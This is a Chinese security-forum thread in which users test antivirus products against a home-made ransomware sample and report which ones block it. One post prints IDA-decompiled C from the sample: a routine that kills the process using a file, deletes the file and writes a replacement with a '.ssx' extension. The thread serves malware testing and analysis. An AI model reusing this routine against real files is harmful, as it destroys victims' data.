自制勒索

显示全部楼层 · 发表于 2021-6-6 18:38:41

KES锁库主防杀

护士拦截，但没回滚

显示全部楼层 · 发表于 2021-6-6 21:59:19

00006666 发表于 2021-6-5 23:19
多步主防:智量防护性能比微点好。

我个人认为还是瑞星能活下来

显示全部楼层 · 发表于 2021-6-7 13:38:24

idgg007 发表于 2021-6-5 22:14
请问是否需要公布源码？

不用吧...
我用ida把加密函数看了个干净

void __cdecl Start(char *Buffer)
{
DWORD v1; // eax
char v2[244]; // [esp+58h] [ebp-180h] BYREF
CHAR Str1[100]; // [esp+14Ch] [ebp-8Ch] BYREF
int v4; // [esp+1B0h] [ebp-28h]
int v5; // [esp+1B4h] [ebp-24h]
int i; // [esp+1B8h] [ebp-20h]
int v7; // [esp+1BCh] [ebp-1Ch]
puts(Buffer);
v7 = 0;
for ( i = 0; Buffer[i]; ++i )
{
if ( Buffer[i] == 92 )
v7 = i;
}
v5 = v7 + 1;
v4 = 0;
while ( Buffer[v5] )
{
Str1[v4++] = Buffer[v5];
Str1[v4] = 0;
++v5;
}
if ( strcmp(Str1, "é•æŽ”å‚¨.exe") )
{
if ( GetProcessCount(Str1) )
{
v1 = GetProcessIdFromName(Str1);
KillProcess(v1);
}
remove(Buffer);
strcat(Buffer, ".ssx");
std::ofstream::basic_ofstream(Buffer, 16);
std::operator<<<std::char_traits<char>>((std::ostream::sentry *)v2, asc_4CD030);
std::ofstream::~ofstream(v2);
}
}

复制代码

显示全部楼层 · 发表于 2021-6-7 15:34:11

猎豹安全浏览器

显示全部楼层 · 发表于 2021-6-7 16:03:40

NT狼狼发表于 2021-6-7 15:34
猎豹安全浏览器

测试个主防试试呢？本帖不是讨论能不能杀的问题，而是能不能拦住

显示全部楼层 · 发表于 2021-6-7 16:40:42

idgg007 发表于 2021-6-5 22:14
请问是否需要公布源码？

gcc编译又没加壳，公不公布一个样

显示全部楼层 · 发表于 2021-6-7 16:46:44

qwe12301 发表于 2021-6-7 16:03
测试个主防试试呢？本帖不是讨论能不能杀的问题，而是能不能拦住

好，我试试

显示全部楼层 · 发表于 2021-6-11 10:25:13

呜呜下不了

显示全部楼层 · 发表于 2021-6-11 21:22:19

Clarkpyu 发表于 2021-6-11 10:25
呜呜下不了

过一段时间就下得了了

显示全部楼层 · 发表于 2021-6-12 16:03:52

微点完全拦截

[病毒样本] 自制勒索